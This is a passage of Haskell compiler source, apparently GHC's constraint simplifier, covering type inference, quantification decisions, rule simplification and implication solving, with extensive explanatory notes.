simplifyInfer rhs_tclvl apply_mr name_taus wanteds
| isEmptyWC wanteds
= do { gbl_tvs <- tcGetGlobalTyVars
; qtkvs <- quantifyTyVars gbl_tvs (tyVarsOfTypes (map snd name_taus))
; traceTc "simplifyInfer: empty WC" (ppr name_taus $$ ppr qtkvs)
; return (qtkvs, [], False, emptyTcEvBinds) }
| otherwise
= do { traceTc "simplifyInfer {" $ vcat
[ ptext (sLit "binds =") <+> ppr name_taus
, ptext (sLit "rhs_tclvl =") <+> ppr rhs_tclvl
, ptext (sLit "apply_mr =") <+> ppr apply_mr
, ptext (sLit "(unzonked) wanted =") <+> ppr wanteds
]
-- Historical note: Before step 2 we used to have a
-- HORRIBLE HACK described in Note [Avoid unecessary
-- constraint simplification] but, as described in Trac
-- #4361, we have taken in out now. That's why we start
-- with step 2!
-- Step 2) First try full-blown solving
-- NB: we must gather up all the bindings from doing
-- this solving; hence (runTcSWithEvBinds ev_binds_var).
-- And note that since there are nested implications,
-- calling solveWanteds will side-effect their evidence
-- bindings, so we can't just revert to the input
-- constraint.
; ev_binds_var <- TcM.newTcEvBinds
; wanted_transformed_incl_derivs <- setTcLevel rhs_tclvl $
runTcSWithEvBinds ev_binds_var (solveWanteds wanteds)
; wanted_transformed_incl_derivs <- zonkWC wanted_transformed_incl_derivs
-- Step 4) Candidates for quantification are an approximation of wanted_transformed
-- NB: Already the fixpoint of any unifications that may have happened
-- NB: We do not do any defaulting when inferring a type, this can lead
-- to less polymorphic types, see Note [Default while Inferring]
; tc_lcl_env <- TcRnMonad.getLclEnv
; null_ev_binds_var <- TcM.newTcEvBinds
; let wanted_transformed = dropDerivedWC wanted_transformed_incl_derivs
; quant_pred_candidates -- Fully zonked
<- if insolubleWC wanted_transformed_incl_derivs
then return [] -- See Note [Quantification with errors]
-- NB: must include derived errors in this test,
-- hence "incl_derivs"
else do { let quant_cand = approximateWC wanted_transformed
meta_tvs = filter isMetaTyVar (varSetElems (tyVarsOfCts quant_cand))
; gbl_tvs <- tcGetGlobalTyVars
-- Miminise quant_cand. We are not interested in any evidence
-- produced, because we are going to simplify wanted_transformed
-- again later. All we want here is the predicates over which to
-- quantify.
--
-- If any meta-tyvar unifications take place (unlikely), we'll
-- pick that up later.
; WC { wc_simple = simples }
<- setTcLevel rhs_tclvl $
runTcSWithEvBinds null_ev_binds_var $
do { mapM_ (promoteAndDefaultTyVar rhs_tclvl gbl_tvs) meta_tvs
-- See Note [Promote _and_ default when inferring]
; solveSimpleWanteds quant_cand }
; return [ ctEvPred ev | ct <- bagToList simples
, let ev = ctEvidence ct
, isWanted ev ] }
-- NB: quant_pred_candidates is already the fixpoint of any
-- unifications that may have happened
; zonked_taus <- mapM (TcM.zonkTcType . snd) name_taus
; let zonked_tau_tvs = tyVarsOfTypes zonked_taus
; (promote_tvs, qtvs, bound, mr_bites) <- decideQuantification apply_mr quant_pred_candidates zonked_tau_tvs
; outer_tclvl <- TcRnMonad.getTcLevel
; runTcSWithEvBinds null_ev_binds_var $ -- runTcS just to get the types right :-(
mapM_ (promoteTyVar outer_tclvl) (varSetElems promote_tvs)
; let minimal_simple_preds = mkMinimalBySCs bound
-- See Note [Minimize by Superclasses]
skol_info = InferSkol [ (name, mkSigmaTy [] minimal_simple_preds ty)
| (name, ty) <- name_taus ]
-- Don't add the quantified variables here, because
-- they are also bound in ic_skols and we want them to be
-- tidied uniformly
; minimal_bound_ev_vars <- mapM TcM.newEvVar minimal_simple_preds
; let implic = Implic { ic_tclvl = rhs_tclvl
, ic_skols = qtvs
, ic_no_eqs = False
, ic_given = minimal_bound_ev_vars
, ic_wanted = wanted_transformed
, ic_insol = False
, ic_binds = ev_binds_var
, ic_info = skol_info
, ic_env = tc_lcl_env }
; emitImplication implic
; traceTc "} simplifyInfer/produced residual implication for quantification" $
vcat [ ptext (sLit "quant_pred_candidates =") <+> ppr quant_pred_candidates
, ptext (sLit "zonked_taus") <+> ppr zonked_taus
, ptext (sLit "zonked_tau_tvs=") <+> ppr zonked_tau_tvs
, ptext (sLit "promote_tvs=") <+> ppr promote_tvs
, ptext (sLit "bound =") <+> ppr bound
, ptext (sLit "minimal_bound =") <+> vcat [ ppr v <+> dcolon <+> ppr (idType v)
| v <- minimal_bound_ev_vars]
, ptext (sLit "mr_bites =") <+> ppr mr_bites
, ptext (sLit "qtvs =") <+> ppr qtvs
, ptext (sLit "implic =") <+> ppr implic ]
; return ( qtvs, minimal_bound_ev_vars
, mr_bites, TcEvBinds ev_binds_var) }
{-
************************************************************************
* *
Quantification
* *
************************************************************************
Note [Deciding quantification]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If the monomorphism restriction does not apply, then we quantify as follows:
* Take the global tyvars, and "grow" them using the equality constraints
E.g. if x:alpha is in the environment, and alpha ~ [beta] (which can
happen because alpha is untouchable here) then do not quantify over
beta
These are the mono_tvs
* Take the free vars of the tau-type (zonked_tau_tvs) and "grow" them
using all the constraints, but knocking out the mono_tvs
The result is poly_qtvs, which we will quantify over.
* Filter the constraints using quantifyPred and the poly_qtvs
If the MR does apply, mono_tvs includes all the constrained tyvars,
and the quantified constraints are empty.
-}
decideQuantification :: Bool -> [PredType] -> TcTyVarSet
-> TcM ( TcTyVarSet -- Promote these
, [TcTyVar] -- Do quantify over these
, [PredType] -- and these
, Bool ) -- Did the MR bite?
-- See Note [Deciding quantification]
decideQuantification apply_mr constraints zonked_tau_tvs
| apply_mr -- Apply the Monomorphism restriction
= do { gbl_tvs <- tcGetGlobalTyVars
; let mono_tvs = gbl_tvs `unionVarSet` constrained_tvs
mr_bites = constrained_tvs `intersectsVarSet` zonked_tau_tvs
promote_tvs = constrained_tvs `unionVarSet` (zonked_tau_tvs `intersectVarSet` gbl_tvs)
; qtvs <- quantifyTyVars mono_tvs zonked_tau_tvs
; traceTc "decideQuantification 1" (vcat [ppr constraints, ppr gbl_tvs, ppr mono_tvs, ppr qtvs])
; return (promote_tvs, qtvs, [], mr_bites) }
| otherwise
= do { gbl_tvs <- tcGetGlobalTyVars
; let mono_tvs = growThetaTyVars (filter isEqPred constraints) gbl_tvs
poly_qtvs = growThetaTyVars constraints zonked_tau_tvs
`minusVarSet` mono_tvs
theta = filter (quantifyPred poly_qtvs) constraints
promote_tvs = mono_tvs `intersectVarSet` (constrained_tvs `unionVarSet` zonked_tau_tvs)
; qtvs <- quantifyTyVars mono_tvs poly_qtvs
; traceTc "decideQuantification 2" (vcat [ppr constraints, ppr gbl_tvs, ppr mono_tvs, ppr poly_qtvs, ppr qtvs, ppr theta])
; return (promote_tvs, qtvs, theta, False) }
where
constrained_tvs = tyVarsOfTypes constraints
------------------
quantifyPred :: TyVarSet -- Quantifying over these
-> PredType -> Bool -- True <=> quantify over this wanted
quantifyPred qtvs pred
= case classifyPredType pred of
ClassPred cls tys
| isIPClass cls -> True -- See note [Inheriting implicit parameters]
| otherwise -> tyVarsOfTypes tys `intersectsVarSet` qtvs
EqPred NomEq ty1 ty2 -> quant_fun ty1 || quant_fun ty2
-- representational equality is like a class constraint
EqPred ReprEq ty1 ty2 -> tyVarsOfTypes [ty1, ty2] `intersectsVarSet` qtvs
IrredPred ty -> tyVarsOfType ty `intersectsVarSet` qtvs
TuplePred {} -> False
where
-- Only quantify over (F tys ~ ty) if tys mentions a quantifed variable
-- In particular, quanitifying over (F Int ~ ty) is a bit like quantifying
-- over (Eq Int); the instance should kick in right here
quant_fun ty
= case tcSplitTyConApp_maybe ty of
Just (tc, tys) | isTypeFamilyTyCon tc
-> tyVarsOfTypes tys `intersectsVarSet` qtvs
_ -> False
------------------
growThetaTyVars :: ThetaType -> TyVarSet -> TyVarSet
-- See Note [Growing the tau-tvs using constraints]
growThetaTyVars theta tvs
| null theta = tvs
| isEmptyVarSet seed_tvs = tvs
| otherwise = fixVarSet mk_next seed_tvs
where
seed_tvs = tvs `unionVarSet` tyVarsOfTypes ips
(ips, non_ips) = partition isIPPred theta
-- See note [Inheriting implicit parameters]
mk_next tvs = foldr grow_one tvs non_ips
grow_one pred tvs
| pred_tvs `intersectsVarSet` tvs = tvs `unionVarSet` pred_tvs
| otherwise = tvs
where
pred_tvs = tyVarsOfType pred
{-
Note [Growing the tau-tvs using constraints]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(growThetaTyVars insts tvs) is the result of extending the set
of tyvars tvs using all conceivable links from pred
E.g. tvs = {a}, preds = {H [a] b, K (b,Int) c, Eq e}
Then growThetaTyVars preds tvs = {a,b,c}
Notice that
growThetaTyVars is conservative if v might be fixed by vs
=> v `elem` grow(vs,C)
Note [Inheriting implicit parameters]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Consider this:
f x = (x::Int) + ?y
where f is *not* a top-level binding.
From the RHS of f we'll get the constraint (?y::Int).
There are two types we might infer for f:
f :: Int -> Int
(so we get ?y from the context of f's definition), or
f :: (?y::Int) => Int -> Int
At first you might think the first was better, because then
?y behaves like a free variable of the definition, rather than
having to be passed at each call site. But of course, the WHOLE
IDEA is that ?y should be passed at each call site (that's what
dynamic binding means) so we'd better infer the second.
BOTTOM LINE: when *inferring types* you must quantify over implicit
parameters, *even if* they don't mention the bound type variables.
Reason: because implicit parameters, uniquely, have local instance
declarations. See the predicate quantifyPred.
Note [Quantification with errors]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If we find that the RHS of the definition has some absolutely-insoluble
constraints, we abandon all attempts to find a context to quantify
over, and instead make the function fully-polymorphic in whatever
type we have found. For two reasons
a) Minimise downstream errors
b) Avoid spurious errors from this function
But NB that we must include *derived* errors in the check. Example:
(a::*) ~ Int#
We get an insoluble derived error *~#, and we don't want to discard
it before doing the isInsolubleWC test! (Trac #8262)
Note [Default while Inferring]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Our current plan is that defaulting only happens at simplifyTop and
not simplifyInfer. This may lead to some insoluble deferred constraints
Example:
instance D g => C g Int b
constraint inferred = (forall b. 0 => C gamma alpha b) /\ Num alpha
type inferred = gamma -> gamma
Now, if we try to default (alpha := Int) we will be able to refine the implication to
(forall b. 0 => C gamma Int b)
which can then be simplified further to
(forall b. 0 => D gamma)
Finally we /can/ approximate this implication with (D gamma) and infer the quantified
type: forall g. D g => g -> g
Instead what will currently happen is that we will get a quantified type
(forall g. g -> g) and an implication:
forall g. 0 => (forall b. 0 => C g alpha b) /\ Num alpha
which, even if the simplifyTop defaults (alpha := Int) we will still be left with an
unsolvable implication:
forall g. 0 => (forall b. 0 => D g)
The concrete example would be:
h :: C g a s => g -> a -> ST s a
f (x::gamma) = (\_ -> x) (runST (h x (undefined::alpha)) + 1)
But it is quite tedious to do defaulting and resolve the implication constraints and
we have not observed code breaking because of the lack of defaulting in inference so
we don't do it for now.
Note [Minimize by Superclasses]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When we quantify over a constraint, in simplifyInfer we need to
quantify over a constraint that is minimal in some sense: For
instance, if the final wanted constraint is (Eq alpha, Ord alpha),
we'd like to quantify over Ord alpha, because we can just get Eq alpha
from superclass selection from Ord alpha. This minimization is what
mkMinimalBySCs does. Then, simplifyInfer uses the minimal constraint
to check the original wanted.
Note [Avoid unecessary constraint simplification]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------- NB NB NB (Jun 12) -------------
This note not longer applies; see the notes with Trac #4361.
But I'm leaving it in here so we remember the issue.)
----------------------------------------
When inferring the type of a let-binding, with simplifyInfer,
try to avoid unnecessarily simplifying class constraints.
Doing so aids sharing, but it also helps with delicate
situations like
instance C t => C [t] where ..
f :: C [t] => ....
f x = let g y = ...(constraint C [t])...
in ...
When inferring a type for 'g', we don't want to apply the
instance decl, because then we can't satisfy (C t). So we
just notice that g isn't quantified over 't' and partition
the constraints before simplifying.
This only half-works, but then let-generalisation only half-works.
*********************************************************************************
* *
* RULES *
* *
***********************************************************************************
See note [Simplifying RULE constraints] in TcRule
Note [RULE quantification over equalities]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Deciding which equalities to quantify over is tricky:
* We do not want to quantify over insoluble equalities (Int ~ Bool)
(a) because we prefer to report a LHS type error
(b) because if such things end up in 'givens' we get a bogus
"inaccessible code" error
* But we do want to quantify over things like (a ~ F b), where
F is a type function.
The difficulty is that it's hard to tell what is insoluble!
So we see whether the simplificaiotn step yielded any type errors,
and if so refrain from quantifying over *any* equalites.
-}
simplifyRule :: RuleName
-> WantedConstraints -- Constraints from LHS
-> WantedConstraints -- Constraints from RHS
-> TcM ([EvVar], WantedConstraints) -- LHS evidence variables
-- See Note [Simplifying RULE constraints] in TcRule
simplifyRule name lhs_wanted rhs_wanted
= do { -- We allow ourselves to unify environment
-- variables: runTcS runs with topTcLevel
(resid_wanted, _) <- solveWantedsTcM (lhs_wanted `andWC` rhs_wanted)
-- Post: these are zonked and unflattened
; zonked_lhs_simples <- TcM.zonkSimples (wc_simple lhs_wanted)
; let (q_cts, non_q_cts) = partitionBag quantify_me zonked_lhs_simples
quantify_me -- Note [RULE quantification over equalities]
| insolubleWC resid_wanted = quantify_insol
| otherwise = quantify_normal
quantify_insol ct = not (isEqPred (ctPred ct))
quantify_normal ct
| EqPred NomEq t1 t2 <- classifyPredType (ctPred ct)
= not (t1 `tcEqType` t2)
| otherwise
= True
; traceTc "simplifyRule" $
vcat [ ptext (sLit "LHS of rule") <+> doubleQuotes (ftext name)
, text "zonked_lhs_simples" <+> ppr zonked_lhs_simples
, text "q_cts" <+> ppr q_cts
, text "non_q_cts" <+> ppr non_q_cts ]
; return ( map (ctEvId . ctEvidence) (bagToList q_cts)
, lhs_wanted { wc_simple = non_q_cts }) }
{-
*********************************************************************************
* *
* Main Simplifier *
* *
***********************************************************************************
Note [Deferring coercion errors to runtime]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
While developing, sometimes it is desirable to allow compilation to succeed even
if there are type errors in the code. Consider the following case:
module Main where
a :: Int
a = 'a'
main = print "b"
Even though `a` is ill-typed, it is not used in the end, so if all that we're
interested in is `main` it is handy to be able to ignore the problems in `a`.
Since we treat type equalities as evidence, this is relatively simple. Whenever
we run into a type mismatch in TcUnify, we normally just emit an error. But it
is always safe to defer the mismatch to the main constraint solver. If we do
that, `a` will get transformed into
co :: Int ~ Char
co = ...
a :: Int
a = 'a' `cast` co
The constraint solver would realize that `co` is an insoluble constraint, and
emit an error with `reportUnsolved`. But we can also replace the right-hand side
of `co` with `error "Deferred type error: Int ~ Char"`. This allows the program
to compile, and it will run fine unless we evaluate `a`. This is what
`deferErrorsToRuntime` does.
It does this by keeping track of which errors correspond to which coercion
in TcErrors (with ErrEnv). TcErrors.reportTidyWanteds does not print the errors
and does not fail if -fdefer-type-errors is on, so that we can continue
compilation. The errors are turned into warnings in `reportUnsolved`.
Note [Zonk after solving]
~~~~~~~~~~~~~~~~~~~~~~~~~
We zonk the result immediately after constraint solving, for two reasons:
a) because zonkWC generates evidence, and this is the moment when we
have a suitable evidence variable to hand.
Note that *after* solving the constraints are typically small, so the
overhead is not great.
-}
solveWantedsTcMWithEvBinds :: EvBindsVar
-> WantedConstraints
-> (WantedConstraints -> TcS WantedConstraints)
-> TcM WantedConstraints
-- Returns a *zonked* result
-- We zonk when we finish primarily to un-flatten out any
-- flatten-skolems etc introduced by canonicalisation of
-- types involving type funuctions. Happily the result
-- is typically much smaller than the input, indeed it is
-- often empty.
solveWantedsTcMWithEvBinds ev_binds_var wc tcs_action
= do { traceTc "solveWantedsTcMWithEvBinds" $ text "wanted=" <+> ppr wc
; wc2 <- runTcSWithEvBinds ev_binds_var (tcs_action wc)
; zonkWC wc2 }
-- See Note [Zonk after solving]
solveWantedsTcM :: WantedConstraints -> TcM (WantedConstraints, Bag EvBind)
-- Zonk the input constraints, and simplify them
-- Return the evidence binds in the BagEvBinds result
-- Discards all Derived stuff in result
-- Postcondition: fully zonked and unflattened constraints
solveWantedsTcM wanted
= do { ev_binds_var <- TcM.newTcEvBinds
; wanteds' <- solveWantedsTcMWithEvBinds ev_binds_var wanted solveWantedsAndDrop
; binds <- TcRnMonad.getTcEvBinds ev_binds_var
; return (wanteds', binds) }
simplifyWantedsTcM :: [Ct] -> TcM WantedConstraints
-- Solve the specified Wanted constraints
-- Discard the evidence binds
-- Discards all Derived stuff in result
-- Postcondition: fully zonked and unflattened constraints
simplifyWantedsTcM wanted
= do { traceTc "simplifyWantedsTcM {" (ppr wanted)
; (result, _) <- runTcS (solveWantedsAndDrop (mkSimpleWC wanted))
; result <- TcM.zonkWC result
; traceTc "simplifyWantedsTcM }" (ppr result)
; return result }
solveWantedsAndDrop :: WantedConstraints -> TcS (WantedConstraints)
-- Since solveWanteds returns the residual WantedConstraints,
-- it should always be called within a runTcS or something similar,
solveWantedsAndDrop wanted = do { wc <- solveWanteds wanted
; return (dropDerivedWC wc) }
solveWanteds :: WantedConstraints -> TcS WantedConstraints
-- so that the inert set doesn't mindlessly propagate.
-- NB: wc_simples may be wanted /or/ derived now
solveWanteds wanteds
= do { traceTcS "solveWanteds {" (ppr wanteds)
-- Try the simple bit, including insolubles. Solving insolubles a
-- second time round is a bit of a waste; but the code is simple
-- and the program is wrong anyway, and we don't run the danger
-- of adding Derived insolubles twice; see
-- TcSMonad Note [Do not add duplicate derived insolubles]
; traceTcS "solveSimples {" empty
; solved_simples_wanteds <- solveSimples wanteds
; traceTcS "solveSimples end }" (ppr solved_simples_wanteds)
-- solveWanteds iterates when it is able to float equalities
-- equalities out of one or more of the implications.
; final_wanteds <- simpl_loop 1 solved_simples_wanteds
; bb <- getTcEvBindsMap
; traceTcS "solveWanteds }" $
vcat [ text "final wc =" <+> ppr final_wanteds
, text "current evbinds =" <+> ppr (evBindMapBinds bb) ]
; return final_wanteds }
solveSimples :: WantedConstraints -> TcS WantedConstraints
-- Solve the wc_simple and wc_insol components of the WantedConstraints
-- Do not affect the inerts
solveSimples (WC { wc_simple = simples, wc_insol = insols, wc_impl = implics })
= nestTcS $
do { let all_simples = simples `unionBags` filterBag (not . isDerivedCt) insols
-- See Note [Dropping derived constraints] in TcRnTypes for
-- why the insolubles may have derived constraints
; wc <- solveSimpleWanteds all_simples
; return ( wc { wc_impl = implics `unionBags` wc_impl wc } ) }
simpl_loop :: Int
-> WantedConstraints
-> TcS WantedConstraints
simpl_loop n wanteds@(WC { wc_simple = simples, wc_insol = insols, wc_impl = implics })
| n > 10
= do { traceTcS "solveWanteds: loop!" empty
; return wanteds }
| otherwise
= do { traceTcS "simpl_loop, iteration" (int n)
; (floated_eqs, unsolved_implics) <- solveNestedImplications implics
; if isEmptyBag floated_eqs
then return (wanteds { wc_impl = unsolved_implics })
else
do { -- Put floated_eqs into the current inert set before looping
(unifs_happened, solve_simple_res)
<- reportUnifications $
solveSimples (WC { wc_simple = floated_eqs `unionBags` simples
-- Put floated_eqs first so they get solved first
, wc_insol = emptyBag, wc_impl = emptyBag })
; let new_wanteds = solve_simple_res `andWC`
WC { wc_simple = emptyBag
, wc_insol = insols
, wc_impl = unsolved_implics }
; if not unifs_happened -- See Note [Cutting off simpl_loop]
&& isEmptyBag (wc_impl solve_simple_res)
then return new_wanteds
else simpl_loop (n+1) new_wanteds } }
solveNestedImplications :: Bag Implication
-> TcS (Cts, Bag Implication)
-- Precondition: the TcS inerts may contain unsolved simples which have
-- to be converted to givens before we go inside a nested implication.
solveNestedImplications implics
| isEmptyBag implics
= return (emptyBag, emptyBag)
| otherwise
= do {
-- inerts <- getTcSInerts
-- ; let thinner_inerts = prepareInertsForImplications inerts
-- -- See Note [Preparing inert set for implications]
--
traceTcS "solveNestedImplications starting {" empty
-- vcat [ text "original inerts = " <+> ppr inerts
-- , text "thinner_inerts = " <+> ppr thinner_inerts ]
; (floated_eqs, unsolved_implics)
<- flatMapBagPairM solveImplication implics
-- ... and we are back in the original TcS inerts
-- Notice that the original includes the _insoluble_simples so it was safe to ignore
-- them in the beginning of this function.
; traceTcS "solveNestedImplications end }" $
vcat [ text "all floated_eqs =" <+> ppr floated_eqs
, text "unsolved_implics =" <+> ppr unsolved_implics ]
; return (floated_eqs, unsolved_implics) }
solveImplication :: Implication -- Wanted
-> TcS (Cts, -- All wanted or derived floated equalities: var = type
Bag Implication) -- Unsolved rest (always empty or singleton)
-- Precondition: The TcS monad contains an empty worklist and given-only inerts
-- which after trying to solve this implication we must restore to their original value
solveImplication imp@(Implic { ic_tclvl = tclvl
, ic_binds = ev_binds
, ic_skols = skols
, ic_given = givens
, ic_wanted = wanteds
, ic_info = info
, ic_env = env })
= do { inerts <- getTcSInerts
; traceTcS "solveImplication {" (ppr imp $$ text "Inerts" <+> ppr inerts)
-- Solve the nested constraints
; (no_given_eqs, residual_wanted)
<- nestImplicTcS ev_binds tclvl $
do { solveSimpleGivens (mkGivenLoc tclvl info env) givens
; residual_wanted <- solveWanteds wanteds
-- solveWanteds, *not* solveWantedsAndDrop, because
-- we want to retain derived equalities so we can float
-- them out in floatEqualities
; no_eqs <- getNoGivenEqs tclvl skols
; return (no_eqs, residual_wanted) }
; (floated_eqs, final_wanted)
<- floatEqualities skols no_given_eqs residual_wanted
; let res_implic | isEmptyWC final_wanted -- && no_given_eqs
= emptyBag -- Reason for the no_given_eqs: we don't want to
-- lose the "inaccessible code" error message
-- BUT: final_wanted still has the derived insolubles
-- so it should be fine
| otherwise
= unitBag (imp { ic_no_eqs = no_given_eqs
, ic_wanted = dropDerivedWC final_wanted
, ic_insol = insolubleWC final_wanted })
; evbinds <- getTcEvBindsMap
; traceTcS "solveImplication end }" $ vcat
[ text "no_given_eqs =" <+> ppr no_given_eqs
, text "floated_eqs =" <+> ppr floated_eqs
, text "res_implic =" <+> ppr res_implic
, text "implication evbinds = " <+> ppr (evBindMapBinds evbinds) ]
; return (floated_eqs, res_implic) }
{-
Note [Cutting off simpl_loop]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It is very important not to iterate in simpl_loop unless there is a chance
of progress. Trac #8474 is a classic example:
* There's a deeply-nested chain of implication constraints.
?x:alpha => ?y1:beta1 => ... ?yn:betan => [W] ?x:Int
* From the innermost one we get a [D] alpha ~ Int,
but alpha is untouchable until we get out to the outermost one
* We float [D] alpha~Int out (it is in floated_eqs), but since alpha
is untouchable, the solveInteract in simpl_loop makes no progress
* So there is no point in attempting to re-solve
?yn:betan => [W] ?x:Int
because we'll just get the same [D] again
* If we *do* re-solve, we'll get an ininite loop. It is cut off by
the fixed bound of 10, but solving the next takes 10*10*...*10 (ie
exponentially many) iterations!
Conclusion: we should iterate simpl_loop iff we will get more 'givens'
in the inert set when solving the nested implications. That is the
result of prepareInertsForImplications is larger. How can we tell
this?
Consider floated_eqs (all wanted or derived):
(a) [W/D] CTyEqCan (a ~ ty). This can give rise to a new given only by causing
a unification. So we count those unifications.
(b) [W] CFunEqCan (F tys ~ xi). Even though these are wanted, they
are pushed in as givens by prepareInertsForImplications. See Note
[Preparing inert set for implications] in TcSMonad. But because
of that very fact, we won't generate another copy if we iterate
simpl_loop. So we iterate if there any of these
-}
------------------
tcCheckSatisfiability :: Bag EvVar -> TcM Bool
-- Return True if satisfiable, False if definitely contradictory
tcCheckSatisfiability givens
= do { lcl_env <- TcM.getLclEnv
; let given_loc = mkGivenLoc topTcLevel UnkSkol lcl_env
; traceTc "checkSatisfiabilty {" (ppr givens)
; (res, _ev_binds) <- runTcS $
do { solveSimpleGivens given_loc (bagToList givens)
; insols <- getInertInsols
; return (not (isEmptyBag insols)) }
; traceTc "checkSatisfiabilty }" (ppr res)
; return (not res) }
promoteTyVar :: TcLevel -> TcTyVar -> TcS ()
-- When we float a constraint out of an implication we must restore
-- invariant (MetaTvInv) in Note [TcLevel and untouchable type variables] in TcType
-- See Note [Promoting unification variables]
promoteTyVar tclvl tv
| isFloatedTouchableMetaTyVar tclvl tv
= do { cloned_tv <- TcS.cloneMetaTyVar tv
; let rhs_tv = setMetaTyVarTcLevel cloned_tv tclvl
; setWantedTyBind tv (mkTyVarTy rhs_tv) }
| otherwise
= return ()
promoteAndDefaultTyVar :: TcLevel -> TcTyVarSet -> TyVar -> TcS ()
-- See Note [Promote _and_ default when inferring]
promoteAndDefaultTyVar tclvl gbl_tvs tv
= do { tv1 <- if tv `elemVarSet` gbl_tvs
then return tv
else defaultTyVar tv
; promoteTyVar tclvl tv1 }
defaultTyVar :: TcTyVar -> TcS TcTyVar
-- Precondition: MetaTyVars only
-- See Note [DefaultTyVar]
defaultTyVar the_tv
| Just default_k <- defaultKind_maybe (tyVarKind the_tv)
= do { tv' <- TcS.cloneMetaTyVar the_tv
; let new_tv = setTyVarKind tv' default_k
; traceTcS "defaultTyVar" (ppr the_tv <+> ppr new_tv)
; setWantedTyBind the_tv (mkTyVarTy new_tv)
; return new_tv }
-- Why not directly derived_pred = mkTcEqPred k default_k?
-- See Note [DefaultTyVar]
-- We keep the same TcLevel on tv'
| otherwise = return the_tv -- The common case
approximateWC :: WantedConstraints -> Cts
-- Postcondition: Wanted or Derived Cts
-- See Note [ApproximateWC]
approximateWC wc
= float_wc emptyVarSet wc
where
float_wc :: TcTyVarSet -> WantedConstraints -> Cts
float_wc trapping_tvs (WC { wc_simple = simples, wc_impl = implics })
= filterBag is_floatable simples `unionBags`
do_bag (float_implic new_trapping_tvs) implics
where
new_trapping_tvs = fixVarSet grow trapping_tvs
is_floatable ct = tyVarsOfCt ct `disjointVarSet` new_trapping_tvs
grow tvs = foldrBag grow_one tvs simples
grow_one ct tvs | ct_tvs `intersectsVarSet` tvs = tvs `unionVarSet` ct_tvs
| otherwise = tvs
where
ct_tvs = tyVarsOfCt ct
float_implic :: TcTyVarSet -> Implication -> Cts
float_implic trapping_tvs imp
| ic_no_eqs imp -- No equalities, so float
= float_wc new_trapping_tvs (ic_wanted imp)
| otherwise -- Don't float out of equalities
= emptyCts -- See Note [ApproximateWC]
where
new_trapping_tvs = trapping_tvs `extendVarSetList` ic_skols imp
do_bag :: (a -> Bag c) -> Bag a -> Bag c
do_bag f = foldrBag (unionBags.f) emptyBag
{-
Note [ApproximateWC]
~~~~~~~~~~~~~~~~~~~~
approximateWC takes a constraint, typically arising from the RHS of a
let-binding whose type we are *inferring*, and extracts from it some
*simple* constraints that we might plausibly abstract over. Of course
the top-level simple constraints are plausible, but we also float constraints
out from inside, if they are not captured by skolems.
The same function is used when doing type-class defaulting (see the call
to applyDefaultingRules) to extract constraints that that might be defaulted.
There are two caveats:
1. We do *not* float anything out if the implication binds equality
constraints, because that defeats the OutsideIn story. Consider
data T a where
TInt :: T Int
MkT :: T a
f TInt = 3::Int
We get the implication (a ~ Int => res ~ Int), where so far we've decided
f :: T a -> res
We don't want to float (res~Int) out because then we'll infer
f :: T a -> Int
which is only on of the possible types. (GHC 7.6 accidentally *did*
float out of such implications, which meant it would happily infer
non-principal types.)
2. We do not float out an inner constraint that shares a type variable
(transitively) with one that is trapped by a skolem. Eg
forall a. F a ~ beta, Integral beta
We don't want to float out (Integral beta). Doing so would be bad
when defaulting, because then we'll default beta:=Integer, and that
makes the error message much worse; we'd get
Can't solve F a ~ Integer
rather than
Can't solve Integral (F a)
Moreover, floating out these "contaminated" constraints doesn't help
when generalising either. If we generalise over (Integral b), we still
can't solve the retained implication (forall a. F a ~ b). Indeed,
arguably that too would be a harder error to understand.
Note [DefaultTyVar]
~~~~~~~~~~~~~~~~~~~
defaultTyVar is used on any un-instantiated meta type variables to
default the kind of OpenKind and ArgKind etc to *. This is important
to ensure that instance declarations match. For example consider
instance Show (a->b)
foo x = show (\_ -> True)
Then we'll get a constraint (Show (p ->q)) where p has kind ArgKind,
and that won't match the typeKind (*) in the instance decl. See tests
tc217 and tc175.
We look only at touchable type variables. No further constraints
are going to affect these type variables, so it's time to do it by
hand. However we aren't ready to default them fully to () or
whatever, because the type-class defaulting rules have yet to run.
An important point is that if the type variable tv has kind k and the
default is default_k we do not simply generate [D] (k ~ default_k) because:
(1) k may be ArgKind and default_k may be * so we will fail
(2) We need to rewrite all occurrences of the tv to be a type
variable with the right kind and we choose to do this by rewriting
the type variable /itself/ by a new variable which does have the
right kind.
Note [Promote _and_ default when inferring]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When we are inferring a type, we simplify the constraint, and then use
approximateWC to produce a list of candidate constraints. Then we MUST
a) Promote any meta-tyvars that have been floated out by
approximateWC, to restore invariant (MetaTvInv) described in
Note [TcLevel and untouchable type variables] in TcType.
b) Default the kind of any meta-tyyvars that are not mentioned in
in the environment.
To see (b), suppose the constraint is (C ((a :: OpenKind) -> Int)), and we
have an instance (C ((x:*) -> Int)). The instance doesn't match -- but it
should! If we don't solve the constraint, we'll stupidly quantify over
(C (a->Int)) and, worse, in doing so zonkQuantifiedTyVar will quantify over
(b:*) instead of (a:OpenKind), which can lead to disaster; see Trac #7332.
Trac #7641 is a simpler example.
Note [Promoting unification variables]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When we float an equality out of an implication we must "promote" free
unification variables of the equality, in order to maintain Invariant
(MetaTvInv) from Note [TcLevel and untouchable type variables] in TcType. for the
leftover implication.
This is absolutely necessary. Consider the following example. We start
with two implications and a class with a functional dependency.
class C x y | x -> y
instance C [a] [a]
(I1) [untch=beta]forall b. 0 => F Int ~ [beta]
(I2) [untch=beta]forall c. 0 => F Int ~ [[alpha]] /\ C beta [c]
We float (F Int ~ [beta]) out of I1, and we float (F Int ~ [[alpha]]) out of I2.
They may react to yield that (beta := [alpha]) which can then be pushed inwards
the leftover of I2 to get (C [alpha] [a]) which, using the FunDep, will mean that
(alpha := a). In the end we will have the skolem 'b' escaping in the untouchable
